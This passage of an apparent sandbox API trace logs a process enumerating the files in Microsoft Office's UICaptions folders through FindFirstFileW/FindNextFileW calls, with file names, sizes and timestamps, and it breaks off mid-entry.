lpFindFileData=0x691f0c4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x74912800, ftCreationTime.dwHighDateTime=0x1cac7f7, ftLastAccessTime.dwLowDateTime=0xeedf6c30, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x74912800, ftLastWriteTime.dwHighDateTime=0x1cac7f7, nFileSizeHigh=0x0, nFileSizeLow=0x39960, dwReserved0=0x0, dwReserved1=0x0, cFileName="GRINTL32.REST.trx_dll", cAlternateFileName="GRINTL~2.TRX")) returned 1 [0212.257] FindNextFileW (in: hFindFile=0xb7f0d0, lpFindFileData=0x691f0c4 | out: lpFindFileData=0x691f0c4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x302da400, ftCreationTime.dwHighDateTime=0x1caca12, ftLastAccessTime.dwLowDateTime=0xeee1cd90, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x302da400, ftLastWriteTime.dwHighDateTime=0x1caca12, nFileSizeHigh=0x0, nFileSizeLow=0x47d60, dwReserved0=0x0, dwReserved1=0x0, cFileName="MAPIR.DLL.trx_dll", cAlternateFileName="MAPIRD~1.TRX")) returned 1 [0212.257] FindNextFileW (in: hFindFile=0xb7f0d0, lpFindFileData=0x691f0c4 | out: lpFindFileData=0x691f0c4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x58968200, ftCreationTime.dwHighDateTime=0x1cac809, ftLastAccessTime.dwLowDateTime=0xeee1cd90, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x58968200, ftLastWriteTime.dwHighDateTime=0x1cac809, nFileSizeHigh=0x0, nFileSizeLow=0xc160, dwReserved0=0x0, dwReserved1=0x0, cFileName="MOR6INT.REST.trx_dll", cAlternateFileName="MOR6IN~1.TRX")) returned 1 [0212.257] FindNextFileW (in: hFindFile=0xb7f0d0, lpFindFileData=0x691f0c4 | out: lpFindFileData=0x691f0c4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x248aaf00, ftCreationTime.dwHighDateTime=0x1caca0b, ftLastAccessTime.dwLowDateTime=0xeee42ef0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x248aaf00, ftLastWriteTime.dwHighDateTime=0x1caca0b, nFileSizeHigh=0x0, nFileSizeLow=0x16f60, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSOINTL.DLL.trx_dll", cAlternateFileName="MSOINT~1.TRX")) returned 1 [0212.257] FindNextFileW (in: hFindFile=0xb7f0d0, lpFindFileData=0x691f0c4 | out: lpFindFileData=0x691f0c4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x25bbdc00, ftCreationTime.dwHighDateTime=0x1caca0b, ftLastAccessTime.dwLowDateTime=0xeeeb5310, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x25bbdc00, ftLastWriteTime.dwHighDateTime=0x1caca0b, nFileSizeHigh=0x0, nFileSizeLow=0x2b2560, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSOINTL.REST.trx_dll", cAlternateFileName="MSOINT~2.TRX")) returned 1 [0212.257] FindNextFileW (in: hFindFile=0xb7f0d0, lpFindFileData=0x691f0c4 | out: lpFindFileData=0x691f0c4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x3564d600, ftCreationTime.dwHighDateTime=0x1cac7fb, ftLastAccessTime.dwLowDateTime=0xeef27730, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x3564d600, ftLastWriteTime.dwHighDateTime=0x1cac7fb, nFileSizeHigh=0x0, nFileSizeLow=0xb360, dwReserved0=0x0, dwReserved1=0x0, cFileName="OMSINTL.DLL.trx_dll", cAlternateFileName="OMSINT~1.TRX")) returned 1 [0212.258] FindNextFileW (in: hFindFile=0xb7f0d0, lpFindFileData=0x691f0c4 | out: lpFindFileData=0x691f0c4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x63b88300, ftCreationTime.dwHighDateTime=0x1cacf6a, ftLastAccessTime.dwLowDateTime=0xeef27730, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x63b88300, ftLastWriteTime.dwHighDateTime=0x1cacf6a, nFileSizeHigh=0x0, nFileSizeLow=0x7b60, dwReserved0=0x0, dwReserved1=0x0, cFileName="ONINTL.DLL.trx_dll", cAlternateFileName="ONINTL~1.TRX")) returned 1 [0212.258] FindNextFileW (in: hFindFile=0xb7f0d0, lpFindFileData=0x691f0c4 | out: lpFindFileData=0x691f0c4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x62875600, ftCreationTime.dwHighDateTime=0x1cacf6a, ftLastAccessTime.dwLowDateTime=0xeef4d890, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x62875600, ftLastWriteTime.dwHighDateTime=0x1cacf6a, nFileSizeHigh=0x0, nFileSizeLow=0x3d960, dwReserved0=0x0, dwReserved1=0x0, cFileName="ONINTL.REST.trx_dll", cAlternateFileName="ONINTL~2.TRX")) returned 1 [0212.258] FindNextFileW (in: hFindFile=0xb7f0d0, lpFindFileData=0x691f0c4 | out: lpFindFileData=0x691f0c4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x302da400, ftCreationTime.dwHighDateTime=0x1caca12, ftLastAccessTime.dwLowDateTime=0xeef4d890, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x302da400, ftLastWriteTime.dwHighDateTime=0x1caca12, nFileSizeHigh=0x0, nFileSizeLow=0x35960, dwReserved0=0x0, dwReserved1=0x0, cFileName="OUTLLIBR.DLL.trx_dll", cAlternateFileName="OUTLLI~1.TRX")) returned 1 [0212.258] FindNextFileW (in: hFindFile=0xb7f0d0, lpFindFileData=0x691f0c4 | out: lpFindFileData=0x691f0c4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x302da400, ftCreationTime.dwHighDateTime=0x1caca12, ftLastAccessTime.dwLowDateTime=0xeef739f0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x302da400, ftLastWriteTime.dwHighDateTime=0x1caca12, nFileSizeHigh=0x0, nFileSizeLow=0x9f560, dwReserved0=0x0, dwReserved1=0x0, cFileName="OUTLLIBR.REST.trx_dll", cAlternateFileName="OUTLLI~2.TRX")) returned 1 [0212.258] FindNextFileW (in: hFindFile=0xb7f0d0, lpFindFileData=0x691f0c4 | out: lpFindFileData=0x691f0c4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x315ed100, ftCreationTime.dwHighDateTime=0x1caca12, ftLastAccessTime.dwLowDateTime=0xeef739f0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x315ed100, ftLastWriteTime.dwHighDateTime=0x1caca12, nFileSizeHigh=0x0, nFileSizeLow=0x2d60, dwReserved0=0x0, dwReserved1=0x0, cFileName="OUTLWVW.DLL.trx_dll", cAlternateFileName="OUTLWV~1.TRX")) returned 1 [0212.258] FindNextFileW (in: hFindFile=0xb7f0d0, lpFindFileData=0x691f0c4 | out: lpFindFileData=0x691f0c4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x1a4a9400, ftCreationTime.dwHighDateTime=0x1cac804, ftLastAccessTime.dwLowDateTime=0xef00bf70, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x1a4a9400, ftLastWriteTime.dwHighDateTime=0x1cac804, nFileSizeHigh=0x0, nFileSizeLow=0xd160, dwReserved0=0x0, dwReserved1=0x0, cFileName="PPINTL.DLL.trx_dll", cAlternateFileName="PPINTL~1.TRX")) returned 1 [0212.259] FindNextFileW (in: hFindFile=0xb7f0d0, lpFindFileData=0x691f0c4 | out: lpFindFileData=0x691f0c4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x19196700, ftCreationTime.dwHighDateTime=0x1cac804, ftLastAccessTime.dwLowDateTime=0xef00bf70, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x19196700, ftLastWriteTime.dwHighDateTime=0x1cac804, nFileSizeHigh=0x0, nFileSizeLow=0x43560, dwReserved0=0x0, dwReserved1=0x0, cFileName="PPINTL.REST.trx_dll", cAlternateFileName="PPINTL~2.TRX")) returned 1 [0212.259] FindNextFileW (in: hFindFile=0xb7f0d0, lpFindFileData=0x691f0c4 | out: lpFindFileData=0x691f0c4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x58968200, ftCreationTime.dwHighDateTime=0x1cac809, ftLastAccessTime.dwLowDateTime=0xef00bf70, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x58968200, ftLastWriteTime.dwHighDateTime=0x1cac809, nFileSizeHigh=0x0, nFileSizeLow=0x1a560, dwReserved0=0x0, dwReserved1=0x0, cFileName="PUB6INTL.DLL.trx_dll", cAlternateFileName="PUB6IN~1.TRX")) returned 1 [0212.259] FindNextFileW (in: hFindFile=0xb7f0d0, lpFindFileData=0x691f0c4 | out: lpFindFileData=0x691f0c4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x57655500, ftCreationTime.dwHighDateTime=0x1cac809, ftLastAccessTime.dwLowDateTime=0xef0320d0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x57655500, ftLastWriteTime.dwHighDateTime=0x1cac809, nFileSizeHigh=0x0, nFileSizeLow=0x87f60, dwReserved0=0x0, dwReserved1=0x0, cFileName="PUB6INTL.REST.trx_dll", cAlternateFileName="PUB6IN~2.TRX")) returned 1 [0212.260] FindNextFileW (in: hFindFile=0xb7f0d0, lpFindFileData=0x691f0c4 | out: lpFindFileData=0x691f0c4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x2720b500, ftCreationTime.dwHighDateTime=0x1cac80f, ftLastAccessTime.dwLowDateTime=0xef0320d0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x2720b500, ftLastWriteTime.dwHighDateTime=0x1cac80f, nFileSizeHigh=0x0, nFileSizeLow=0x57f60, dwReserved0=0x0, dwReserved1=0x0, cFileName="PUBWZINT.REST.trx_dll", cAlternateFileName="PUBWZI~1.TRX")) returned 1 [0212.260] FindNextFileW (in: hFindFile=0xb7f0d0, lpFindFileData=0x691f0c4 | out: lpFindFileData=0x691f0c4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x94d0df00, ftCreationTime.dwHighDateTime=0x1cac817, ftLastAccessTime.dwLowDateTime=0xef058230, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x94d0df00, ftLastWriteTime.dwHighDateTime=0x1cac817, nFileSizeHigh=0x0, nFileSizeLow=0x3360, dwReserved0=0x0, dwReserved1=0x0, cFileName="SGRES.DLL.trx_dll", cAlternateFileName="SGRESD~1.TRX")) returned 1 [0212.261] FindNextFileW (in: hFindFile=0xb7f0d0, lpFindFileData=0x691f0c4 | out: lpFindFileData=0x691f0c4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xca190500, ftCreationTime.dwHighDateTime=0x1cac7f6, ftLastAccessTime.dwLowDateTime=0xef058230, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xca190500, ftLastWriteTime.dwHighDateTime=0x1cac7f6, nFileSizeHigh=0x0, nFileSizeLow=0x4360, dwReserved0=0x0, dwReserved1=0x0, cFileName="STINTL.DLL.trx_dll", cAlternateFileName="STINTL~1.TRX")) returned 1 [0212.261] FindNextFileW (in: hFindFile=0xb7f0d0, lpFindFileData=0x691f0c4 | out: lpFindFileData=0x691f0c4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xbf706700, ftCreationTime.dwHighDateTime=0x1cac81a, ftLastAccessTime.dwLowDateTime=0xef0a44f0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xbf706700, ftLastWriteTime.dwHighDateTime=0x1cac81a, nFileSizeHigh=0x0, nFileSizeLow=0x6960, dwReserved0=0x0, dwReserved1=0x0, cFileName="VISBRRES.DLL.trx_dll", cAlternateFileName="VISBRR~1.TRX")) returned 1 [0212.261] FindNextFileW (in: hFindFile=0xb7f0d0, lpFindFileData=0x691f0c4 | out: lpFindFileData=0x691f0c4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x70273800, ftCreationTime.dwHighDateTime=0x1cac814, ftLastAccessTime.dwLowDateTime=0xef0a44f0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x70273800, ftLastWriteTime.dwHighDateTime=0x1cac814, nFileSizeHigh=0x0, nFileSizeLow=0x73960, dwReserved0=0x0, dwReserved1=0x0, cFileName="VISINTL.DLL.trx_dll", cAlternateFileName="VISINT~1.TRX")) returned 1 [0212.261] FindNextFileW (in: hFindFile=0xb7f0d0, lpFindFileData=0x691f0c4 | out: lpFindFileData=0x691f0c4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa1789a00, ftCreationTime.dwHighDateTime=0x1cacd25, ftLastAccessTime.dwLowDateTime=0xef0ca650, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xa1789a00, ftLastWriteTime.dwHighDateTime=0x1cacd25, nFileSizeHigh=0x0, nFileSizeLow=0x24360, dwReserved0=0x0, dwReserved1=0x0, cFileName="WWINTL.DLL.trx_dll", cAlternateFileName="WWINTL~1.TRX")) returned 1 [0212.261] FindNextFileW (in: hFindFile=0xb7f0d0, lpFindFileData=0x691f0c4 | out: lpFindFileData=0x691f0c4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa2a9c700, ftCreationTime.dwHighDateTime=0x1cacd25, ftLastAccessTime.dwLowDateTime=0xef0f07b0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xa2a9c700, ftLastWriteTime.dwHighDateTime=0x1cacd25, nFileSizeHigh=0x0, nFileSizeLow=0x110b60, dwReserved0=0x0, dwReserved1=0x0, cFileName="WWINTL.REST.trx_dll", cAlternateFileName="WWINTL~2.TRX")) returned 1 [0212.261] FindNextFileW (in: hFindFile=0xb7f0d0, lpFindFileData=0x691f0c4 | out: lpFindFileData=0x691f0c4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x61df1900, ftCreationTime.dwHighDateTime=0x1cac820, ftLastAccessTime.dwLowDateTime=0xef0f07b0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x61df1900, ftLastWriteTime.dwHighDateTime=0x1cac820, nFileSizeHigh=0x0, nFileSizeLow=0x23960, dwReserved0=0x0, dwReserved1=0x0, cFileName="XLINTL32.DLL.trx_dll", cAlternateFileName="XLINTL~1.TRX")) returned 1 [0212.262] FindNextFileW (in: hFindFile=0xb7f0d0, lpFindFileData=0x691f0c4 | out: lpFindFileData=0x691f0c4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x61df1900, ftCreationTime.dwHighDateTime=0x1cac820, ftLastAccessTime.dwLowDateTime=0xef116910, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x61df1900, ftLastWriteTime.dwHighDateTime=0x1cac820, nFileSizeHigh=0x0, nFileSizeLow=0x126760, dwReserved0=0x0, dwReserved1=0x0, cFileName="XLINTL32.REST.trx_dll", cAlternateFileName="XLINTL~2.TRX")) returned 1 [0212.262] FindNextFileW (in: hFindFile=0xb7f0d0, lpFindFileData=0x691f0c4 | out: lpFindFileData=0x691f0c4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xd7e38000, ftCreationTime.dwHighDateTime=0x1cac820, ftLastAccessTime.dwLowDateTime=0xef116910, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xd7e38000, ftLastWriteTime.dwHighDateTime=0x1cac820, nFileSizeHigh=0x0, nFileSizeLow=0x3960, dwReserved0=0x0, dwReserved1=0x0, cFileName="XLSLICER.DLL.trx_dll", cAlternateFileName="XLSLIC~1.TRX")) returned 1 [0212.262] FindNextFileW (in: hFindFile=0xb7f0d0, lpFindFileData=0x691f0c4 | out: lpFindFileData=0x691f0c4*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0212.262] FindClose (in: hFindFile=0xb7f0d0 | out: hFindFile=0xb7f0d0) returned 1 [0212.263] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x691f34c) returned 1 [0212.263] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x691f358) returned 1 [0212.263] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x691f38c) returned 1 [0212.263] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082", nBufferLength=0x105, lpBuffer=0x691ee94, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082", lpFilePart=0x0) returned 0x2f [0212.263] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\", nBufferLength=0x105, lpBuffer=0x691ee68, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\", lpFilePart=0x0) returned 0x30 [0212.264] FindFirstFileW (in: lpFileName="C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\*", lpFindFileData=0x691f0b4 | out: lpFindFileData=0x691f0b4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xeed38550, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xef116910, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xef116910, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb7f0d0 [0212.265] FindNextFileW (in: hFindFile=0xb7f0d0, lpFindFileData=0x691f0c4 | out: lpFindFileData=0x691f0c4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xeed38550, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xef116910, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xef116910, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0212.265] FindNextFileW (in: hFindFile=0xb7f0d0, lpFindFileData=0x691f0c4 | out: lpFindFileData=0x691f0c4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x302da400, ftCreationTime.dwHighDateTime=0x1caca12, ftLastAccessTime.dwLowDateTime=0xeed38550, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x302da400, ftLastWriteTime.dwHighDateTime=0x1caca12, nFileSizeHigh=0x0, nFileSizeLow=0x3760, dwReserved0=0x0, dwReserved1=0x0, cFileName="ENVELOPR.DLL.trx_dll", cAlternateFileName="ENVELO~1.TRX")) returned 1 [0212.265] FindNextFileW (in: hFindFile=0xb7f0d0, lpFindFileData=0x691f0c4 | out: lpFindFileData=0x691f0c4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x74912800, ftCreationTime.dwHighDateTime=0x1cac7f7, ftLastAccessTime.dwLowDateTime=0xeedf6c30, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x74912800, ftLastWriteTime.dwHighDateTime=0x1cac7f7, nFileSizeHigh=0x0, nFileSizeLow=0xb960, dwReserved0=0x0, dwReserved1=0x0, cFileName="GRINTL32.DLL.trx_dll", cAlternateFileName="GRINTL~1.TRX")) returned 1 [0212.265] FindNextFileW (in: hFindFile=0xb7f0d0, lpFindFileData=0x691f0c4 | out: lpFindFileData=0x691f0c4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x74912800, ftCreationTime.dwHighDateTime=0x1cac7f7, ftLastAccessTime.dwLowDateTime=0xeedf6c30, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x74912800, ftLastWriteTime.dwHighDateTime=0x1cac7f7, nFileSizeHigh=0x0, nFileSizeLow=0x39960, dwReserved0=0x0, dwReserved1=0x0, cFileName="GRINTL32.REST.trx_dll", cAlternateFileName="GRINTL~2.TRX")) returned 1 [0212.266] FindNextFileW (in: hFindFile=0xb7f0d0, lpFindFileData=0x691f0c4 | out: lpFindFileData=0x691f0c4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x302da400, ftCreationTime.dwHighDateTime=0x1caca12, ftLastAccessTime.dwLowDateTime=0xeee1cd90, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x302da400, ftLastWriteTime.dwHighDateTime=0x1caca12, nFileSizeHigh=0x0, nFileSizeLow=0x47d60, dwReserved0=0x0, dwReserved1=0x0, cFileName="MAPIR.DLL.trx_dll", cAlternateFileName="MAPIRD~1.TRX")) returned 1 [0212.266] FindNextFileW (in: hFindFile=0xb7f0d0, lpFindFileData=0x691f0c4 | out: lpFindFileData=0x691f0c4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x58968200, ftCreationTime.dwHighDateTime=0x1cac809, ftLastAccessTime.dwLowDateTime=0xeee1cd90, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x58968200, ftLastWriteTime.dwHighDateTime=0x1cac809, nFileSizeHigh=0x0, nFileSizeLow=0xc160, dwReserved0=0x0, dwReserved1=0x0, cFileName="MOR6INT.REST.trx_dll", cAlternateFileName="MOR6IN~1.TRX")) returned 1 [0212.266] FindNextFileW (in: hFindFile=0xb7f0d0, lpFindFileData=0x691f0c4 | out: lpFindFileData=0x691f0c4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x248aaf00, ftCreationTime.dwHighDateTime=0x1caca0b, ftLastAccessTime.dwLowDateTime=0xeee42ef0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x248aaf00, ftLastWriteTime.dwHighDateTime=0x1caca0b, nFileSizeHigh=0x0, nFileSizeLow=0x16f60, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSOINTL.DLL.trx_dll", cAlternateFileName="MSOINT~1.TRX")) returned 1 [0212.266] FindNextFileW (in: hFindFile=0xb7f0d0, lpFindFileData=0x691f0c4 | out: lpFindFileData=0x691f0c4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x25bbdc00, ftCreationTime.dwHighDateTime=0x1caca0b, ftLastAccessTime.dwLowDateTime=0xeeeb5310, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x25bbdc00, ftLastWriteTime.dwHighDateTime=0x1caca0b, nFileSizeHigh=0x0, nFileSizeLow=0x2b2560, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSOINTL.REST.trx_dll", cAlternateFileName="MSOINT~2.TRX")) returned 1 [0212.266] FindNextFileW (in: hFindFile=0xb7f0d0, lpFindFileData=0x691f0c4 | out: lpFindFileData=0x691f0c4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x3564d600, ftCreationTime.dwHighDateTime=0x1cac7fb, ftLastAccessTime.dwLowDateTime=0xeef27730, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x3564d600, ftLastWriteTime.dwHighDateTime=0x1cac7fb, nFileSizeHigh=0x0, nFileSizeLow=0xb360, dwReserved0=0x0, dwReserved1=0x0, cFileName="OMSINTL.DLL.trx_dll", cAlternateFileName="OMSINT~1.TRX")) returned 1 [0212.267] FindNextFileW (in: hFindFile=0xb7f0d0, lpFindFileData=0x691f0c4 | out: lpFindFileData=0x691f0c4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x63b88300, ftCreationTime.dwHighDateTime=0x1cacf6a, ftLastAccessTime.dwLowDateTime=0xeef27730, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x63b88300, ftLastWriteTime.dwHighDateTime=0x1cacf6a, nFileSizeHigh=0x0, nFileSizeLow=0x7b60, dwReserved0=0x0, dwReserved1=0x0, cFileName="ONINTL.DLL.trx_dll", cAlternateFileName="ONINTL~1.TRX")) returned 1 [0212.267] FindNextFileW (in: hFindFile=0xb7f0d0, lpFindFileData=0x691f0c4 | out: lpFindFileData=0x691f0c4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x62875600, ftCreationTime.dwHighDateTime=0x1cacf6a, ftLastAccessTime.dwLowDateTime=0xeef4d890, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x62875600, ftLastWriteTime.dwHighDateTime=0x1cacf6a, nFileSizeHigh=0x0, nFileSizeLow=0x3d960, dwReserved0=0x0, dwReserved1=0x0, cFileName="ONINTL.REST.trx_dll", cAlternateFileName="ONINTL~2.TRX")) returned 1 [0212.267] FindNextFileW (in: hFindFile=0xb7f0d0, lpFindFileData=0x691f0c4 | out: lpFindFileData=0x691f0c4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x302da400, ftCreationTime.dwHighDateTime=0x1caca12, ftLastAccessTime.dwLowDateTime=0xeef4d890, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x302da400, ftLastWriteTime.dwHighDateTime=0x1caca12, nFileSizeHigh=0x0, nFileSizeLow=0x35960, dwReserved0=0x0, dwReserved1=0x0, cFileName="OUTLLIBR.DLL.trx_dll", cAlternateFileName="OUTLLI~1.TRX")) returned 1 [0212.267] FindNextFileW (in: hFindFile=0xb7f0d0, lpFindFileData=0x691f0c4 | out: lpFindFileData=0x691f0c4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x302da400, ftCreationTime.dwHighDateTime=0x1caca12, ftLastAccessTime.dwLowDateTime=0xeef739f0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x302da400, ftLastWriteTime.dwHighDateTime=0x1caca12, nFileSizeHigh=0x0, nFileSizeLow=0x9f560, dwReserved0=0x0, dwReserved1=0x0, cFileName="OUTLLIBR.REST.trx_dll", cAlternateFileName="OUTLLI~2.TRX")) returned 1 [0212.268] FindNextFileW (in: hFindFile=0xb7f0d0, lpFindFileData=0x691f0c4 | out: lpFindFileData=0x691f0c4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x315ed100, ftCreationTime.dwHighDateTime=0x1caca12, ftLastAccessTime.dwLowDateTime=0xeef739f0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x315ed100, ftLastWriteTime.dwHighDateTime=0x1caca12, nFileSizeHigh=0x0, nFileSizeLow=0x2d60, dwReserved0=0x0, dwReserved1=0x0, cFileName="OUTLWVW.DLL.trx_dll", cAlternateFileName="OUTLWV~1.TRX")) returned 1 [0212.268] FindNextFileW (in: hFindFile=0xb7f0d0, lpFindFileData=0x691f0c4 | out: lpFindFileData=0x691f0c4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x1a4a9400, ftCreationTime.dwHighDateTime=0x1cac804, ftLastAccessTime.dwLowDateTime=0xef00bf70, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x1a4a9400, ftLastWriteTime.dwHighDateTime=0x1cac804, nFileSizeHigh=0x0, nFileSizeLow=0xd160, dwReserved0=0x0, dwReserved1=0x0, cFileName="PPINTL.DLL.trx_dll", cAlternateFileName="PPINTL~1.TRX")) returned 1 [0212.268] FindNextFileW (in: hFindFile=0xb7f0d0, lpFindFileData=0x691f0c4 | out: lpFindFileData=0x691f0c4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x19196700, ftCreationTime.dwHighDateTime=0x1cac804, ftLastAccessTime.dwLowDateTime=0xef00bf70, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x19196700, ftLastWriteTime.dwHighDateTime=0x1cac804, nFileSizeHigh=0x0, nFileSizeLow=0x43560, dwReserved0=0x0, dwReserved1=0x0, cFileName="PPINTL.REST.trx_dll", cAlternateFileName="PPINTL~2.TRX")) returned 1 [0212.268] FindNextFileW (in: hFindFile=0xb7f0d0, lpFindFileData=0x691f0c4 | out: lpFindFileData=0x691f0c4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x58968200, ftCreationTime.dwHighDateTime=0x1cac809, ftLastAccessTime.dwLowDateTime=0xef00bf70, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x58968200, 